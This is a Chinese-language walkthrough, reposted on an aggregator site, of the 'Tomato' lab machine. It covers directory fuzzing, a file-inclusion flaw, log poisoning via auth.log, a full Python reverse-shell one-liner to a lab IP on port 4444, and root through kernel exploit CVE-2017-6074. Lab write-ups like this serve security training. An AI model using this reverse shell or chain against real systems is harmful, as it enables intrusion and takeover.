Tomato

编程入门 行业动态 更新时间:2024-10-20 06:38:46

<a href=https://www.elefans.com/category/jswz/34/1718876.html style=Tomato"/>

Tomato

信息收集

运行我们的bash脚本,发现目标系统开放了ftp和web服务

我们尝试是否可以匿名登录ftp,未果

我们访问web服务,发现是一个番茄图片,查看源码也没什么发现

我们fuzz一下路径,发现了存在一个antibot_image路径

dirsearch -u "http://192.168.101.197/" -e * -x404,500,403 -w /usr/share/seclists/Discovery/Web-Content/common.txt


我们发现存在一个info.php文件

文件的源码提示我们存在文件包含漏洞

我们验证漏洞确实是真实存在的

漏洞利用

我们尝试将一句话写进日志文件中,日志文件的路径为/var/log/auth.log,发现已被写入日志并成功执行我们的命令


那么我们就可以查找python是否存在,若存在则可以反弹shell到我们本地的机子上。可以看到python是存在的,并且版本为3.5

我们将执行如下的payload添加到cmd参数后获得一个shell

python3 -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.196",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"])'

提权

我们将linpeas.sh脚本上传到靶机上,并执行它

发现存在一个linux内核漏洞

我们发现这个内核漏洞对应的漏洞编号为CVE-2017-6074,我们将其编译变上传到靶机上,执行即root

更多推荐

Tomato

本文发布于:2024-03-07 20:46:05,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1718878.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:Tomato

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!